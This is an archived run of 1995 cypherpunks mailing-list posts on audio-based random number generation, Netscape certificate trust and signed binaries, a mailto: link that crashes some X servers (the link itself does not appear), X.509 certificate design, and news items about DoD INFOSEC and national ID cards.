=mBAk
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------
NOTE: Currently travelling on sabbatical. Expect responses within 7 days.
-------------------------------------------------------------------------
                   ROBERT McNALLY - MINOTAUR CONSULTING
                   Ironwolf@Minotaur.com * 714/648-2248
    Specializing in Computer Games and Digital Entertainment Software
 Over 15 Years of Industry Experience: Creative * Technical * Managerial
-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 2 Oct 95 21:34:52 PDT
To: mark@unicorn.com (Rev. Mark Grant)
Subject: Re: One-Time-Pad generation from audio device
In-Reply-To: <Pine.3.89.9510021627.A14466-0100000@unicorn.com>
Message-ID: <199510030437.AAA05775@homeport.org>
MIME-Version: 1.0
Content-Type: text


	If there is no microphone plugged into the audio port, the
random numbers tend to be of very poor quality.  (At least on a sun,
visual inspection of the output shows how poor the numbers are.)  I
suspect a few quick tests, followed by warnings to the user to turn on
the microphone, would be quite useful.

Adam


% head /dev/audio | od | head
0000000  077776 077777 077377 177577 177777 177377 177576 077776
0000020  077776 177577 077376 077376 077577 177576 177177 077376
0000040  077576 077776 077377 177777 177576 177377 077377 077377
0000060  077576 177775 077576 177776 177576 177377 177176 177177


| The code basically reads in a 512-byte block from /dev/audio, then takes
| the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
| I'm getting is not particularly random and will compress by 3:1 using gzip
| or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
| give a truly random output (it's certainly uncompressible).
| 
| Before I release the source code to the Net, can anyone give me any good
| reasons to believe that this won't produce physically random output, or
| make suggestions on how to test, or improve, the generated output ? There's
| a #define which can be used to easily increase the amount of data fed into
| the MD5, but at the moment it will only generate about 1 MB per hour on a
| Sparcstation (limited by the audio input rate), so I don't want to
| increase that if I don't have to. 



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 2 Oct 95 21:45:15 PDT
To: Dave Dittrich <dittrich@cac.washington.edu>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <9510021817.AA01271@red2.cac.washington.edu>
Message-ID: <199510030445.AAA29715@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dave Dittrich writes:
> 
> > Perry writes, regarding alpha decay counts for random numbers:
> > 
> > > And, as I noted, there are RS232 interfaceable radiation detectors you
> > > can buy off the shelf -- no hardware hacking needed.

> I was thinking about this the other day and wondered if it wouldn't be
> cheap and relatively easy to build a board that samples and sums
> several randomly selected signals on various frequencies on the AM
> broadcast spectrum.

Radio signals can be interfered with or listened to -- never
underestimate the opponent. Computer interfaced radiation detectors,
in spite of Tim's claim to the contrary, are pretty cheap and very
hard to interfere with.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 2 Oct 95 21:51:48 PDT
To: hallam@w3.org
Subject: Re: WHERE did this come from?
In-Reply-To: <9510021655.AA07536@zorch.w3.org>
Message-ID: <199510030454.AAA06674@homeport.org>
MIME-Version: 1.0
Content-Type: text


hallam@w3.org wrote:

| It appears that someone may have obtained the cypherpunks mailing
| list and used it as the basis for the Spam. This is a serious matter.

You mean the list of folks subscribed to cypherpunks?  The list that
you get by sending mail to majordomoe@toad.com with a body of 'who
cypherpunks'?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 3 Oct 95 00:04:11 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: Crypto APIs
Message-ID: <199510030459.AAA71133@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Matt writes:

<snip>

>Yes.  (ICE, by the way, is funded by ARPA and run by TIS.  Strange notion
>of "experiment", given that the result of the "experiment" will be to see
>whether the government will allow it.  So one part of DoD is funding TIS
>to find out how another part of DoD behaves...)

Your tax dollars at work.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMHC9lW1lp8bpvW01AQHg4gQAge0AzJBK7zlQux8Mc6evJZm/Z87noNYM
qtS9cc6OPtcBP7kvrwf/sAa1X+vsHQkKec/WsJ3xH944P8m8WuDgTa2/gMoro50E
rymwS6ZtIftrmCis4vpTg6xSPhMXDSHg9NcffLNrKXDQh4xW1aRzIgiixRbBCg1s
gXyQ5GoGPqk=
=TVrb
-----END PGP SIGNATURE-----
Regards, Jim Ray

 "One of the penalties for refusing to participate in politics is
  that you end up being governed by your inferiors."  -- Plato
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 3 Oct 95 01:45:32 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <199510030840.BAA04677@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Doesn't crash on SunOS 4.1.3_U1 running X11R6.

> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 2 Oct 95 19:48:34 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <9510030248.AA08909@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



On the topic of risks for a "major browser" to be tempered/targetted
as a virus :

I asked monthes ago netscape folks to make md5sum and/or PGP digital
signatures (preferably md5sum of each files, this in a file, itself
pgp signed) of the binaries available on their page and on relevant 
newsgroup to reduce possibility of tempering.

[ok it won't help mythical joe six pack's but...]

Maybe I'll got more luck calling from here :-)


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

SEAL Team 6 SDI NORAD Nazi mururoa cryptographic Panama




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 01:36:55 PDT
To: cypherpunks@toad.com
Subject: New Netscape bug (in version 1.12)
Message-ID: <199510030836.EAA09080@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



C'punks, 
  I just got back from a vacation in Raleigh, and downloaded the
new "fixed" Netscape 1.12. It took me about an hour, but I've
discovered another bug and potential security hole. This one relates
to mailto:.

  The bug is as follows. Create a HTML file with a hyperlink containing
the following URL

 foo 

This bug doesn't seem to crash Netscape, instead, it crashes my XServer
as soon as the mail window pops op. I'm too tired right now to try to
analyze it, but it might be another stack bug, this time, in the X
libraries because Netscape isn't doing any sanity checking.

I need help testing this bug on other platforms. I have created
a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
to test.

I have also found 2 other bugs that cause stack trashing in v1.1
however, they are random and I haven't been able to isolate them
completely yet. (I have created a page on my system, such that if you
visit it, after you visit about 3 more pages, it crashes)

What's my point in pursuing this? Netscape's browser is a piece of
software that runs on millions of computers and in effect, allows
outside agents to input arbitrary data into that software. As such,
it is unlike most applications made. Sure, Microsoft Word may have bugs,
but how many people are downloading hundreds of MS Word documents
everyday and viewing them? Users of Web browsers are exposing themselves
like this everyday, and so I think, that web browsers must have higher
standards of robustness.


I think Netscape represents an enormous risk to computer security,
and while I think they are heading in the right direction, there are
some very basic implementation issues they need to clear up which are
orthogonal to SSL and credit card transactions. All the cryptography
in the world won't help you if someone can subvert your cryptobox.
Netscape needs to do some serious quality assurance work. I've never
been a QA person in my life, but within a few minutes, I have been
able to find serious bugs in the software. And while I'm sure
Netscape's coders are fine people, proof reading your own code,
code that you look at everyday, becomes rather hard because you
tend to "see through it". (just like proof reading essays, or messages)
I think Netscape should hire some outside firm/group to review their
code under non-disclosure for potential implementation holes.

-Ray Cromwell <rjc@clark.net>
P.S. I am running Netscape v1.12 under BSDI2.0 and the XAccel/2.0 server


 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 01:57:17 PDT
To: sameer@c2.org (sameer)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030840.BAA04677@infinity.c2.org>
Message-ID: <199510030857.EAA10604@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Doesn't crash on SunOS 4.1.3_U1 running X11R6.
> 
> > I need help testing this bug on other platforms. I have created
> > a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> > to test.

Thanks for the info.

  It may be a bug in BSDI's Xserver then. However, the overlong
domain bug is also a bug in the NIS code. So while the crash
may not occur within Netscape code itself, I am a little wary 
that it is not performing sanity checking. If it turns out to do nasty
stuff to Windows clients, then it may be significant.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 02:20:50 PDT
To: sameer@c2.org (sameer)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030840.BAA04677@infinity.c2.org>
Message-ID: <199510030920.FAA12203@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Doesn't crash on SunOS 4.1.3_U1 running X11R6.

  Just tried it under NT 3.5 with Netscape 1.1. It didn't crash
as soon as the mail window popped up (like it does under my
BSDI2.0), however clicking on "send" caused Netscape to quit/die
(but not with any GPF or failure) Varying the length and data in the
mailto may have other effects.


-Ray

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 3 Oct 95 03:02:16 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <Pine.SUN.3.91.951003060032.26587B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


It doesn't crash Windoze (hardly surprising).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 2 Oct 95 23:13:30 PDT
To: cypherpunks@toad.com
Subject: Re: Spoofing HTTP server certificates
In-Reply-To: <199510020737.AAA27256@ix7.ix.netcom.com>
Message-ID: <44qk8v$igc@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510020737.AAA27256@ix7.ix.netcom.com>, stewarts@ix.netcom.com (Bill Stewart) writes:
> At 12:52 AM 10/2/95 -0400, Greg Miller <gmiller@grendel.ius.indiana.edu> wrote:
> >	Since there has been a lot of talk about the "man in the middle" 
> >attack on the secure web servers, has anyone actually considered the 
> >processing time required to fake a certificate from scratch?
> >	I haven't really familiarized myself with how the certificates 
> >are generated, etc, but it's my understanding that they are signed with RSA.
> 
> While I haven't seen Verisign's various public keys posted to the net,
> and didn't see them anywhere on their web page, I assume they're at least
> 508 bits long, and the ones for better-than-personna certification
> (or at least Class 3) ought to be ~1024 bits long, unless they're limiting
> themselves to 512 bits to support software that's limited by ITAR stupidity
> (which would be a shame, but is certainly possible.)

  You can see the certificate(including public key) for RSA/Verisign's
sercure server authority by looking at:

	http://home.netscape.com/newsref/ref/rsa-server-ca.html

  It is a >1000 bit key.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 2 Oct 95 23:20:12 PDT
To: cypherpunks@toad.com
Subject: Re: User-Specified Trusted CAs in Netscape (Was: Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <199510012043.NAA06905@illilouette.Eng.Sun.COM>
Message-ID: <44qklr$igc@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510020516.BAA21934@giane.cs.umass.edu>, futplex@pseudonym.com (Futplex) writes:
> Bill Soley writes:
> > (3) Netscape is making the problem worse (yes, worse) in the next release
> > by allowing the user to specify their own list of trusted CAs.  (I will
> > elaborate on this unpopular view below.)
> [...]
> > Re: problem 3, about how allowing the user to specify their own list of
> > trusted CAs is bad.  
> [...]
> > it.  Even Mary Moderately-Savy might be tricked in to doing it on the
> > false assumption that it would only affect security for the naughty
> > pictures site (that she may not care about), and not affect security for
> > her stock-broker.  This false assumption might be based on the fact
> > that the (legitimate) stock-broker uses a different CA.
> 
> You seem to be overstating your point a bit. The real problem here, AFAICS,
> is that the proposed protocol in the software wouldn't allow sufficiently 
> fine-grained control over the certification authority approval. The user
> should be able to specify the conditions under which a CA is to be trusted,
> not simply give a blanket approval or rejection. 
> 
> It looks as though a set of trusted (CA, site) pairs would suffice. 
> How about it, Netscape ?  Give the user the opportunity to say "I trust 
> certificates from Alfie's World of Key Certification regarding keys for
> interactions with Elvira's Copier Shack."

  We've already thought of a lot of the stuff you guys have brought up,
and tried to address them in our design.  I'm also taking note on things
we didn't think of.

  There will be various "domains" that you can trust a CA for, including
SSL, e-mail, and payment.  You will be able to enable and disable trust
for specific server certs as well.  You could say, "I don't trust
verisign, but I will trust Joe's Internet Coffee Shop(which happens
to be signed by verisign)".

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 2 Oct 95 23:34:59 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <44qlhk$igc@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9510030248.AA08909@hplyot.obspm.fr>, dl@hplyot.obspm.fr (Laurent Demailly) writes:
> 
> On the topic of risks for a "major browser" to be tempered/targetted
> as a virus :
>
> I asked monthes ago netscape folks to make md5sum and/or PGP digital
> signatures (preferably md5sum of each files, this in a file, itself
> pgp signed) of the binaries available on their page and on relevant 
> newsgroup to reduce possibility of tempering.
> 
> [ok it won't help mythical joe six pack's but...]
> 
> Maybe I'll got more luck calling from here :-)

  I've been thinking about this recently for obvious reasons.  My concern
is that if someone can attack your download of netscape, they could also
attack your download of the program that validates netscape.  Is there
really any way out of this one?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Tue, 3 Oct 95 04:15:50 PDT
To: cypherpunks@toad.com
Subject: CISS TSP MISSI
Message-ID: <199510031115.HAA21583@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.disa.mil/ciss/tsp.html


  INFOSEC TRAINING AND SECURITY PRODUCTS (TSP) DEPARTMENT
  
   
   
   The INFOSEC Training and Security Products Department is 
responsible
   for developing, coordinating and executing a DoD-wide 
INFOWAR
   education, training and awareness program; creating an 
INFOWAR Career
   Management Program for DoD; and developing, coordinating, 
documenting
   and executing DoD-wide procedures to identify and 
disseminate INFOSEC
   products to meet DoD-wide INFOWAR requirements.
   
   This department of CISS is also responsible for the update 
and
   distribution of the Multilevel Information Systems Security 
Initiative
   (MISSI) Implementation Guide. The MISSI Guide is a planning 
tool,
   enabling DoD and other agencies to determine resource 
requirements to
   implement various MISSI services into their infrastructure.

   [Insert Multilevel Security (MLS) excerpt]

   The MLS Program is partnered with NSA's Multilevel 
Information Systems
   Security Initiative (MISSI). The MISSI Program is intended 
to provide
   a set of MLS technologies that comply with the DoD Goal 
Security
   Architecture. These technologies, when developed over the 
next five
   years, will be implemented in operational environments by 
the MLS
   Program. In the meantime, the MLS Program will continue to 
identify,
   assess, and implement commercially available MLS 
technologies to
   satisfy immediate MLS requirements throughout DoD.

   [End insert]
   
   The DISSPATCH newsletter, an INFOSEC publication is 
published 4 times
   per year by TSP. Electronic copies will be loaded here soon.
   
   The Security Products Database is a stand-alone database 
containing
   information on over 400 security products, to include their 
technical
   characteristics and points of contact.
   
   TSP is also building an INFOSEC Training Facility (ITF) at 
our Falls
   Church, Virginia location. The ITF will provide state of the 
art
   information systems security training to include the suite 
MISSI
   educational offerings.
   
   
   
   Commercial telephone: (703) 681-1325, DSN: 761-1325
   
   Back to the CISS Page
   
   
   yorkw@cc.ims.disa.mil Last Revision - 31 August 1995
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 3 Oct 95 07:38:58 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <DFv6uo.4so@sgi.sgi.com>
Message-ID: <199510031438.HAA06918@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFv6uo.4so@sgi.sgi.com>, Ray Cromwell <rjc@clark.net> writes:

> C'punks, 
>   I just got back from a vacation in Raleigh, and downloaded the
> new "fixed" Netscape 1.12. It took me about an hour, but I've
> discovered another bug and potential security hole. This one relates
> to mailto:.

>   The bug is as follows. Create a HTML file with a hyperlink containing
> the following URL

>  foo 

> This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> as soon as the mail window pops op. I'm too tired right now to try to
> analyze it, but it might be another stack bug, this time, in the X
> libraries because Netscape isn't doing any sanity checking.

This is a bug in your X server, not in netscape.  The X server should
never crash no matter what you send to it.

> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.

This doesn't crash my X server (SGI Irix 6.2), so it's probably specific
to XAccel.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@ee.siue.edu>
Date: Tue, 3 Oct 95 05:59:07 PDT
To: rjc@clark.net
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <199510031259.HAA01229@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


It doesn't crash Solaris 2.4 running X11R5 (Netscape 1.1N)

> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.

-Arve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Oct 95 06:18:06 PDT
To: cypherpunks@toad.com
Subject: Telco Blob
Message-ID: <199510031308.JAA10163@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times of October 3 has a humongous 40-page insert
   on international telecommunications -- markets, business,
   technology, and, to be sure, the tele-players lying,
   cheating, fearing the "computer hacking industry,"
   whimpering with delirious greed at the bountiful,
   multicultured consumer's mindless credulity of tekkie-
   gadgets. For the mil-beguiled Colin Powells there's even a
   colored global map of Big Blob telco strategic rapacity.

   A tiny cheering blip of machine-wash-n-readable T-stupidity
   on p. 34:

      Sutton dismisses worries out security -- despite a
      recent successful attempt to break the security on
      Internet financial transactions. An incident in August,
      when a researcher at the French National Institute of
      Computer Science and Control (INRIA) broke into the
      Internet security system, raised concerns about
      security.

      "A lot of security is about perception -- after all,
      every code can be broken. The INRIA incident only
      involved breaking a single code and needed massive
      computer resources to do it," says Mr Sutton.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Tue, 3 Oct 95 07:16:06 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <v01510102ac9701a9005a@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ray Cromwell wrote:
>  The bug is as follows. Create a HTML file with a hyperlink containing
>the following URL
>
> foo 
>
>This bug doesn't seem to crash Netscape, instead, it crashes my XServer
>as soon as the mail window pops op. I'm too tired right now to try to
>analyze it, but it might be another stack bug, this time, in the X
>libraries because Netscape isn't doing any sanity checking.
>
>I need help testing this bug on other platforms. I have created
>a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
>to test.

Nothing on Mac Netscape 1.12 nor on the latest Windows 3.x Netscape.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMHFRwHIf3YegbdiBAQGR6wJXTcCiqgHeunkdLyd1kGUhRTx2JP0p1PN3
UKdThUKLTL7utPDFevRORjF/3B/ziVszJlk+5PASfQeF6DlKYG8ib9Fr0OdW1E0p
CPRK
=6T18
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 3 Oct 95 02:50:31 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <44r106$moh@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  I tested your crash page on 1.12 for SGI, and 2.0 on SGI and Windows NT,
and none of them had any problem.

  I spent five years working on the X server, and my credo then was that if the
X server crashes, its a bug in the X server, no matter what wild
shit the client throws at it.  (I feel the same way about netscape now...)

  I suggest you complain to your X server vendor.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Oct 95 06:51:14 PDT
To: cypherpunks@toad.com
Subject: ZIT_pus
Message-ID: <199510031351.JAA09367@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-3-95. Wash Rag:


   "Employment Database Proposal Raises Cries of 'Big
   Brother'."

      Critics say that in its zeal to combat illegal
      immigration, Congress is steering the nation toward an
      "Orwellian nightmare," an era of all-knowing federal
      oversight whereby officials will be able to verify
      citizenship by using high-tech national identification
      cards. So far, no member of Congress has openly called
      for a national ID card, at least by that name.

      Rep. Bill McCollurn (R-Fla.) said he intends to offer an
      amendment on the House floor to create a "more secure"
      Social Security card with a photo, a hologram and
      "perhaps a biometric identifier."

      Microchip technology can make ID cards especially
      intrusive. According to an analysis by the Cato
      Institute, one newly patented ID card can hold a photo
      and 1,600 pages of text. Another identification system
      developed by a major defense contractor consists of a
      microchip the size of a grain of rice that can be
      implanted under the skin with a syringe and read with a
      scanner.


   ZIT_pus  (7 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Tue, 3 Oct 95 06:56:10 PDT
To: rjc@clark.net
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <9510031355.AA18290@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain



|   From owner-cypherpunks@toad.com Tue Oct  3 04:39:23 1995
|   Subject: New Netscape bug (in version 1.12)
|   X-Mailer: ELM [version 2.4 PL24alpha3]
|   Content-Transfer-Encoding: 8bit
|   Sender: owner-cypherpunks@toad.com
|   X-Status: 
|   
|   
|   C'punks, 
|     I just got back from a vacation in Raleigh, and downloaded the
|   new "fixed" Netscape 1.12. It took me about an hour, but I've
|   discovered another bug and potential security hole. This one relates
|   to mailto:.

Well, I'm still in Raleigh :-) but this doesn't do much of anything
to my Macintosh, Netscape 1.1N, under System 7.5. Looks like a bug
in your X server. However, Netscape 1.1N for Solaris, running under
X11R6 X server, dumps core fairly quickly. I haven't had a chance
to try out the 1.12 version on UNIX or Mac, but the 1.22 32-bit 
Windoze version handles it fine under NT 3.5.1.

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 3 Oct 95 10:00:06 PDT
To: jsw@neon.netscape.com
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
Message-ID: <9510031656.AA00760@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   I've been thinking about this recently for obvious reasons.  My concern
> is that if someone can attack your download of netscape, they could also
> attack your download of the program that validates netscape.  Is there
> really any way out of this one?
> 
> 	--Jeff

I remember sometime in the last couple of years seeing a cert advisory that
said that people's checksumming programs were being replaced by ones that
did the normal checksumming except on compromised programs.  This was part
of one particular attack as I remember.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 07:25:35 PDT
To: stewarts@ix.netcom.com
Subject: Re: Certificate proposal
In-Reply-To: <199510022148.OAA26396@ix7.ix.netcom.com>
Message-ID: <9510031421.AA18121@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 02 Oct 1995 14:48:26 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>
>
>1) X.509 explicitly addresses Certificate Revocation Lists, though it
>	   isn't real precise about how they should be distributed, and the
>	   hierarchical approach isn't necessarily the best.  (Maybe put the 
>	   location of the preferred CRL for a key certificate in the cert itself?)

The whole issue of CRLs is on shaky ground with me.  I think it's gotten
lost in debates about how to distribute them offline (or perhaps via
e-mail) and have them work.

CRLs are like the old credit card or check stop lists which used to be at
every supermarket checkout station.  They aren't there any more.
Checkout stations are now on-line.

I see nothing wrong with having a "certificate" which says ``certificate
available online only at xxx@yyy.zzz''.

>3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
>	   mechanism for additional information other than cramming it into
>	   the username, but supposedly X.509 Version 3 includes something?

Yup -- and it's ugly.  It counts on a defined OBJECT ID to define the
attribute.  That means that if you want to say something about a person
("Boy, she's good looking!") you need to get someone tied to the OBJID
hierarchy to issue you a number.  If that number is low enough in the
tree, (is long enough), then you have the problem that no one knows
what it means.  For that matter, even numbers high in the tree are
unknown to me.  I've never seen a dictionary of OBJECT IDs.

>Binding a key to a text-string usually representing a person does give you
>the slack to use other mechanisms rather than wait for the release of
>/standard-name="Attribute Semantics Notation"/version=32769/ORG="International
>Slowness
>Organization"/Country=none/reliability=ExtremelyHighTrustUsThisTime/versionh
>istory=

Clearly.  One should never wait for ISO.  In fact, ISO should probably be
ignored from now on.  (Have you seen on-line Dilbert today?)

but back to the question: the slack to use other mechanisms is the weak
link I was talking about.  You are building a chain from attribute or
permission or authorization over to a person where one link (certificate)
is a steel link and the other (binding to person) is mercerized cotton.  If
you want to strengthen the second link, you have to do things like the
national ID card -- or restrict the second link to corporate use (the
current approach) -- or otherwise regiment the human body in physical
space.  By chaining directly from key to authorization, the human can be
anonymous in physical space while still being known in cyberspace.

The thing to avoid is the following:

>Make a determination in your own mind whether this key actually
>belongs to the person whom you think it belongs to, based on available
>evidence.  If you think it does, then based on your estimate of
>that person's integrity and competence in key management, answer
>the following question:

The only way to make that determination is to look at the text string and
the list of other people who have signed it -- to see if I think they might
know a different Bill Stewart from the person I know.  But then, since I
don't know Bill Stewart at all (except by postings), that's irrelevant to
me.  Therefore, I can not meet that test.  However, there is no reason for
me to reject your key as invalid.  What's invalid is the assumption that
there must be a relationship (or even a person) in physical space *before*
one can have a relationship (or a person) in cyberspace.

>For now, there do seem to be some kinds of attributes that would benefit from
>better representations than a human-name plus free-form text, such as
>"which application does the user want you to use this key for?" "how much
>should I
>trust the user's desire to have me use that key for that application?"
>"how do I get this key's owner to give me money?" "does the key-holder 
>have the authority to speak for a given organization/human/bank account?"

I prefer text.  I didn't say it had to be free form -- only that it had to
include free form so that I could say, from one human to another, something
which no one had anticipated and sign that.

If you want a machine to read it, you can use SMTP-style "tag: value".

The idea that machine readability requires binary transfer and/or ASN.1
